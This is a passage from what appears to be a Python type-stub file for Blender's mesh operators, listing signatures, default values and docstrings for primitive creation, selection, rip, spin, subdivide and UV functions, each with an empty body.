0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a conic mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius1: Radius 1 \n :type radius1: float\n :param radius2: Radius 2 \n :type radius2: float\n :param depth: Depth \n :type depth: float\n :param end_fill_type: Base Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type end_fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. 
\n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cube_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a cube mesh \n\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cube_add_gizmo(\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0),\n matrix: float = ((0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0),\n (0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0))):\n '''Construct a cube mesh \n\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n :param matrix: Matrix \n :type matrix: float\n '''\n\n pass\n\n\ndef primitive_cylinder_add(vertices: int = 32,\n radius: float = 1.0,\n depth: float = 2.0,\n end_fill_type: typing.Union[int, str] = 'NGON',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a cylinder mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius: Radius \n :type radius: float\n :param depth: Depth \n :type depth: float\n :param end_fill_type: Cap Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type end_fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. 
\n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_grid_add(x_subdivisions: int = 10,\n y_subdivisions: int = 10,\n size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a grid mesh \n\n :param x_subdivisions: X Subdivisions \n :type x_subdivisions: int\n :param y_subdivisions: Y Subdivisions \n :type y_subdivisions: int\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_ico_sphere_add(subdivisions: int = 2,\n radius: float = 1.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct an Icosphere mesh \n\n :param subdivisions: Subdivisions \n :type subdivisions: int\n :param radius: Radius \n :type radius: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_monkey_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a Suzanne mesh \n\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. 
\n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_plane_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a filled planar mesh with 4 vertices \n\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_torus_add(align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0),\n major_segments: int = 48,\n minor_segments: int = 12,\n mode: typing.Union[int, str] = 'MAJOR_MINOR',\n major_radius: float = 1.0,\n minor_radius: float = 0.25,\n abso_major_rad: float = 1.25,\n abso_minor_rad: float = 0.75,\n generate_uvs: bool = True):\n '''Construct a torus mesh \n\n :param align: AlignWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location \n :type location: float\n :param rotation: Rotation \n :type rotation: float\n :param major_segments: Major Segments, Number of segments for the main ring of the torus \n :type major_segments: int\n :param minor_segments: Minor Segments, Number of segments for the minor ring of the torus \n :type minor_segments: int\n :param mode: Torus DimensionsMAJOR_MINOR Major/Minor, Use the major/minor radii for torus dimensions.EXT_INT Exterior/Interior, Use the exterior/interior radii for torus dimensions. 
\n :type mode: typing.Union[int, str]\n :param major_radius: Major Radius, Radius from the origin to the center of the cross sections \n :type major_radius: float\n :param minor_radius: Minor Radius, Radius of the torus’ cross section \n :type minor_radius: float\n :param abso_major_rad: Exterior Radius, Total Exterior Radius of the torus \n :type abso_major_rad: float\n :param abso_minor_rad: Interior Radius, Total Interior Radius of the torus \n :type abso_minor_rad: float\n :param generate_uvs: Generate UVs, Generate a default UV map \n :type generate_uvs: bool\n '''\n\n pass\n\n\ndef primitive_uv_sphere_add(segments: int = 32,\n ring_count: int = 16,\n radius: float = 1.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a UV sphere mesh \n\n :param segments: Segments \n :type segments: int\n :param ring_count: Rings \n :type ring_count: int\n :param radius: Radius \n :type radius: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef quads_convert_to_tris(quad_method: typing.Union[int, str] = 'BEAUTY',\n ngon_method: typing.Union[int, str] = 'BEAUTY'):\n '''Triangulate selected faces \n\n :param quad_method: Quad Method, Method for splitting the quads into trianglesBEAUTY Beauty , Split the quads in nice triangles, slower method.FIXED Fixed, Split the quads on the first and third vertices.FIXED_ALTERNATE Fixed Alternate, Split the quads on the 2nd and 4th vertices.SHORTEST_DIAGONAL Shortest Diagonal, Split the quads based on the distance between the vertices. \n :type quad_method: typing.Union[int, str]\n :param ngon_method: Polygon Method, Method for splitting the polygons into trianglesBEAUTY Beauty, Arrange the new triangles evenly (slow).CLIP Clip, Split the polygons with an ear clipping algorithm. 
\n :type ngon_method: typing.Union[int, str]\n '''\n\n pass\n\n\ndef region_to_loop():\n '''Select boundary edges around the selected faces \n\n '''\n\n pass\n\n\ndef remove_doubles(threshold: float = 0.0001, use_unselected: bool = False):\n '''Merge vertices based on their proximity \n\n :param threshold: Merge Distance, Maximum distance between elements to merge \n :type threshold: float\n :param use_unselected: Unselected, Merge selected to other unselected vertices \n :type use_unselected: bool\n '''\n\n pass\n\n\ndef reveal(select: bool = True):\n '''Reveal all hidden vertices, edges and faces \n\n :param select: Select \n :type select: bool\n '''\n\n pass\n\n\ndef rip(mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False,\n use_fill: bool = False):\n '''Disconnect vertex or edges from connected geometry \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n :param use_fill: Fill, Fill the ripped region \n :type use_fill: bool\n '''\n\n pass\n\n\ndef rip_edge(mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Extend vertices along the edge closest to the cursor \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. 
\n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef rip_edge_move(MESH_OT_rip_edge=None, TRANSFORM_OT_translate=None):\n '''Extend vertices and move the result \n\n :param MESH_OT_rip_edge: Extend Vertices, Extend vertices along the edge closest to the cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef rip_move(MESH_OT_rip=None, TRANSFORM_OT_translate=None):\n '''Rip polygons and move the result \n\n :param MESH_OT_rip: Rip, Disconnect vertex or edges from connected geometry \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef screw(steps: int = 9,\n turns: int = 1,\n center: float = (0.0, 0.0, 0.0),\n axis: float = (0.0, 0.0, 0.0)):\n '''Extrude selected vertices in screw-shaped rotation around the cursor in indicated viewport \n\n :param steps: Steps, Steps \n :type steps: int\n :param turns: Turns, Turns \n :type turns: int\n :param center: Center, Center in global view space \n :type center: float\n :param axis: Axis, Axis in global view space \n :type axis: float\n '''\n\n pass\n\n\ndef select_all(action: typing.Union[int, str] = 'TOGGLE'):\n '''(De)select all vertices, edges or faces \n\n :param action: Action, Selection action to executeTOGGLE Toggle, Toggle selection for all elements.SELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.INVERT Invert, Invert selection of all elements. \n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_axis(orientation: typing.Union[int, str] = 'LOCAL',\n sign: typing.Union[int, str] = 'POS',\n axis: typing.Union[int, str] = 'X',\n threshold: float = 0.0001):\n '''Select all data in the mesh on a single axis \n\n :param orientation: Axis Mode, Axis orientationGLOBAL Global, Align the transformation axes to world space.LOCAL Local, Align the transformation axes to the selected objects’ local space.NORMAL Normal, Align the transformation axes to average normal of selected elements (bone Y axis for pose mode).GIMBAL Gimbal, Align each axis to the Euler rotation axis as used for input.VIEW View, Align the transformation axes to the window.CURSOR Cursor, Align the transformation axes to the 3D cursor. 
\n :type orientation: typing.Union[int, str]\n :param sign: Axis Sign, Side to select \n :type sign: typing.Union[int, str]\n :param axis: Axis, Select the axis to compare each vertex on \n :type axis: typing.Union[int, str]\n :param threshold: Threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef select_face_by_sides(number: int = 4,\n type: typing.Union[int, str] = 'EQUAL',\n extend: bool = True):\n '''Select vertices or faces by the number of polygon sides \n\n :param number: Number of Vertices \n :type number: int\n :param type: Type, Type of comparison to make \n :type type: typing.Union[int, str]\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_interior_faces():\n '''Select faces where all edges have more than 2 face users \n\n '''\n\n pass\n\n\ndef select_less(use_face_step: bool = True):\n '''Deselect vertices, edges or faces at the boundary of each selection region \n\n :param use_face_step: Face Step, Connected faces (instead of edges) \n :type use_face_step: bool\n '''\n\n pass\n\n\ndef select_linked(delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}):\n '''Select all vertices connected to the current selection \n\n :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef select_linked_pick(deselect: bool = False,\n delimit: typing.Set[typing.Union[int, str]] = {'SEAM'},\n index=-1):\n '''(De)select all vertices linked to the edge under the mouse cursor \n\n :param deselect: Deselect \n :type deselect: bool\n :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef select_loose(extend: bool = False):\n '''Select loose geometry based on the selection mode \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_mirror(axis: typing.Set[typing.Union[int, str]] = {'X'},\n extend: bool = False):\n '''Select mesh items at mirrored locations \n\n :param axis: Axis \n :type axis: typing.Set[typing.Union[int, str]]\n :param extend: Extend, Extend the existing selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_mode(use_extend: bool = False,\n use_expand: bool = False,\n type: typing.Union[int, str] = 'VERT',\n action: typing.Union[int, str] = 'TOGGLE'):\n '''Change selection mode \n\n :param use_extend: Extend \n :type use_extend: bool\n :param use_expand: Expand \n :type use_expand: bool\n :param type: TypeVERT Vertex, Vertex selection mode.EDGE Edge, Edge selection mode.FACE Face, Face selection mode. \n :type type: typing.Union[int, str]\n :param action: Action, Selection action to executeDISABLE Disable, Disable selected markers.ENABLE Enable, Enable selected markers.TOGGLE Toggle, Toggle disabled flag for selected markers. 
\n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_more(use_face_step: bool = True):\n '''Select more vertices, edges or faces connected to initial selection \n\n :param use_face_step: Face Step, Connected faces (instead of edges) \n :type use_face_step: bool\n '''\n\n pass\n\n\ndef select_next_item():\n '''Select the next element (using selection order) \n\n '''\n\n pass\n\n\ndef select_non_manifold(extend: bool = True,\n use_wire: bool = True,\n use_boundary: bool = True,\n use_multi_face: bool = True,\n use_non_contiguous: bool = True,\n use_verts: bool = True):\n '''Select all non-manifold vertices or edges \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n :param use_wire: Wire, Wire edges \n :type use_wire: bool\n :param use_boundary: Boundaries, Boundary edges \n :type use_boundary: bool\n :param use_multi_face: Multiple Faces, Edges shared by 3+ faces \n :type use_multi_face: bool\n :param use_non_contiguous: Non Contiguous, Edges between faces pointing in alternate directions \n :type use_non_contiguous: bool\n :param use_verts: Vertices, Vertices connecting multiple face regions \n :type use_verts: bool\n '''\n\n pass\n\n\ndef select_nth(skip: int = 1, nth: int = 1, offset: int = 0):\n '''Deselect every Nth element starting from the active vertex, edge or face \n\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef select_prev_item():\n '''Select the previous element (using selection order) \n\n '''\n\n pass\n\n\ndef select_random(percent: float = 50.0,\n seed: int = 0,\n action: typing.Union[int, str] = 'SELECT'):\n '''Randomly select vertices \n\n :param percent: Percent, Percentage of objects to select randomly \n :type percent: float\n :param seed: Random Seed, Seed for the random number generator \n :type seed: int\n :param action: Action, Selection action to executeSELECT Select, Select all elements.DESELECT Deselect, Deselect all elements. 
\n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_similar(type: typing.Union[int, str] = 'NORMAL',\n compare: typing.Union[int, str] = 'EQUAL',\n threshold: float = 0.0):\n '''Select similar vertices, edges or faces by property types \n\n :param type: Type \n :type type: typing.Union[int, str]\n :param compare: Compare \n :type compare: typing.Union[int, str]\n :param threshold: Threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef select_similar_region():\n '''Select similar face regions to the current selection \n\n '''\n\n pass\n\n\ndef select_ungrouped(extend: bool = False):\n '''Select vertices without a group \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef separate(type: typing.Union[int, str] = 'SELECTED'):\n '''Separate selected geometry into a new mesh \n\n :param type: Type \n :type type: typing.Union[int, str]\n '''\n\n pass\n\n\ndef set_normals_from_faces(keep_sharp: bool = False):\n '''Set the custom normals from the selected faces ones \n\n :param keep_sharp: Keep Sharp Edges, Do not set sharp edges to face \n :type keep_sharp: bool\n '''\n\n pass\n\n\ndef shape_propagate_to_all():\n '''Apply selected vertex locations to all other shape keys \n\n '''\n\n pass\n\n\ndef shortest_path_pick(edge_mode: typing.Union[int, str] = 'SELECT',\n use_face_step: bool = False,\n use_topology_distance: bool = False,\n use_fill: bool = False,\n skip: int = 0,\n nth: int = 1,\n offset: int = 0,\n index=-1):\n '''Select shortest path between two selections \n\n :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path \n :type edge_mode: typing.Union[int, str]\n :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) \n :type use_face_step: bool\n :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance \n :type use_topology_distance: bool\n :param use_fill: Fill Region, Select all paths between the source/destination elements \n :type use_fill: bool\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef shortest_path_select(edge_mode: typing.Union[int, str] = 'SELECT',\n use_face_step: bool = False,\n use_topology_distance: bool = False,\n use_fill: bool = False,\n skip: int = 0,\n nth: int = 1,\n offset: int = 0):\n '''Selected shortest path between two vertices/edges/faces \n\n :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path \n :type edge_mode: typing.Union[int, str]\n :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) \n :type use_face_step: bool\n :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance \n :type use_topology_distance: bool\n :param use_fill: Fill Region, Select all paths between the source/destination elements \n :type use_fill: bool\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef smoothen_normals(factor: float = 0.5):\n '''Smoothen custom normals based on adjacent 
vertex normals \n\n :param factor: Factor, Specifies weight of smooth vs original normal \n :type factor: float\n '''\n\n pass\n\n\ndef solidify(thickness: float = 0.01):\n '''Create a solid skin by extruding, compensating for sharp angles \n\n :param thickness: Thickness \n :type thickness: float\n '''\n\n pass\n\n\ndef sort_elements(type: typing.Union[int, str] = 'VIEW_ZAXIS',\n elements: typing.Set[typing.Union[int, str]] = {'VERT'},\n reverse: bool = False,\n seed: int = 0):\n '''The order of selected vertices/edges/faces is modified, based on a given method \n\n :param type: Type, Type of re-ordering operation to applyVIEW_ZAXIS View Z Axis, Sort selected elements from farthest to nearest one in current view.VIEW_XAXIS View X Axis, Sort selected elements from left to right one in current view.CURSOR_DISTANCE Cursor Distance, Sort selected elements from nearest to farthest from 3D cursor.MATERIAL Material, Sort selected elements from smallest to greatest material index (faces only!).SELECTED Selected, Move all selected elements in first places, preserving their relative order (WARNING: this will affect unselected elements’ indices as well!).RANDOMIZE Randomize, Randomize order of selected elements.REVERSE Reverse, Reverse current order of selected elements. \n :type type: typing.Union[int, str]\n :param elements: Elements, Which elements to affect (vertices, edges and/or faces) \n :type elements: typing.Set[typing.Union[int, str]]\n :param reverse: Reverse, Reverse the sorting effect \n :type reverse: bool\n :param seed: Seed, Seed for random-based operations \n :type seed: int\n '''\n\n pass\n\n\ndef spin(steps: int = 9,\n dupli: bool = False,\n angle: float = 1.5708,\n use_auto_merge: bool = True,\n use_normal_flip: bool = False,\n center: float = (0.0, 0.0, 0.0),\n axis: float = (0.0, 0.0, 0.0)):\n '''Extrude selected vertices in a circle around the cursor in indicated viewport \n\n :param steps: Steps, Steps \n :type steps: int\n :param dupli: Use Duplicates \n :type dupli: bool\n :param angle: Angle, Rotation for each step \n :type angle: float\n :param use_auto_merge: Auto Merge, Merge first/last when the angle is a full revolution \n :type use_auto_merge: bool\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param center: Center, Center in global view space \n :type center: float\n :param axis: Axis, Axis in global view space \n :type axis: float\n '''\n\n pass\n\n\ndef split():\n '''Split off selected geometry from connected unselected geometry \n\n '''\n\n pass\n\n\ndef split_normals():\n '''Split custom normals of selected vertices \n\n '''\n\n pass\n\n\ndef subdivide(number_cuts: int = 1,\n smoothness: float = 0.0,\n ngon: bool = True,\n quadcorner: typing.Union[int, str] = 'STRAIGHT_CUT',\n fractal: float = 0.0,\n fractal_along_normal: float = 0.0,\n seed: int = 0):\n '''Subdivide selected edges \n\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param ngon: Create N-Gons, When disabled, newly created faces are limited to 3-4 sided faces \n :type ngon: bool\n :param quadcorner: Quad Corner Type, How to subdivide quad corners (anything other than Straight Cut will prevent ngons) \n :type quadcorner: typing.Union[int, str]\n :param fractal: Fractal, Fractal randomness factor \n :type fractal: float\n :param fractal_along_normal: Along Normal, Apply fractal displacement along normal only \n :type fractal_along_normal: float\n :param seed: Random Seed, Seed for 
the random number generator \n :type seed: int\n '''\n\n pass\n\n\ndef subdivide_edgering(number_cuts: int = 10,\n interpolation: typing.Union[int, str] = 'PATH',\n smoothness: float = 1.0,\n profile_shape_factor: float = 0.0,\n profile_shape: typing.Union[int, str] = 'SMOOTH'):\n '''Subdivide perpendicular edges to the selected edge ring \n\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param interpolation: Interpolation, Interpolation method \n :type interpolation: typing.Union[int, str]\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded \n :type profile_shape_factor: float\n :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. \n :type profile_shape: typing.Union[int, str]\n '''\n\n pass\n\n\ndef symmetrize(direction: typing.Union[int, str] = 'NEGATIVE_X',\n threshold: float = 0.0001):\n '''Enforce symmetry (both form and topological) across an axis \n\n :param direction: Direction, Which sides to copy from and to \n :type direction: typing.Union[int, str]\n :param threshold: Threshold, Limit for snap middle vertices to the axis center \n :type threshold: float\n '''\n\n pass\n\n\ndef symmetry_snap(direction: typing.Union[int, str] = 'NEGATIVE_X',\n threshold: float = 0.05,\n factor: float = 0.5,\n use_center: bool = True):\n '''Snap vertex pairs to their mirrored locations \n\n :param direction: Direction, Which sides to copy from and to \n :type direction: typing.Union[int, str]\n :param threshold: Threshold, Distance within which matching vertices are searched \n :type threshold: float\n :param factor: Factor, Mix factor of the locations of the vertices \n :type factor: float\n :param use_center: Center, Snap middle vertices to the axis center \n :type use_center: bool\n '''\n\n pass\n\n\ndef tris_convert_to_quads(face_threshold: float = 0.698132,\n shape_threshold: float = 0.698132,\n uvs: bool = False,\n vcols: bool = False,\n seam: bool = False,\n sharp: bool = False,\n materials: bool = False):\n '''Join triangles into quads \n\n :param face_threshold: Max Face Angle, Face angle limit \n :type face_threshold: float\n :param shape_threshold: Max Shape Angle, Shape angle limit \n :type shape_threshold: float\n :param uvs: Compare UVs \n :type uvs: bool\n :param vcols: Compare VCols \n :type vcols: bool\n :param seam: Compare Seam \n :type seam: bool\n :param sharp: Compare Sharp \n :type sharp: bool\n :param materials: Compare Materials \n :type materials: bool\n '''\n\n pass\n\n\ndef unsubdivide(iterations: int = 2):\n '''UnSubdivide selected edges & faces \n\n :param iterations: Iterations, Number of times to unsubdivide \n :type iterations: int\n '''\n\n pass\n\n\ndef uv_texture_add():\n '''Add UV Map \n\n '''\n\n pass\n\n\ndef uv_texture_remove():\n '''Remove UV Map \n\n '''\n\n pass\n\n\ndef uvs_reverse():\n '''Flip direction of UV coordinates inside faces \n\n '''\n\n pass\n\n\ndef uvs_rotate(use_ccw: bool = False):\n '''Rotate UV coordinates inside faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef vert_connect():\n '''Connect selected vertices of faces, splitting the face \n\n '''\n\n pass\n\n\ndef vert_connect_concave():\n '''Make all faces convex \n\n '''\n\n pass\n\n\ndef 
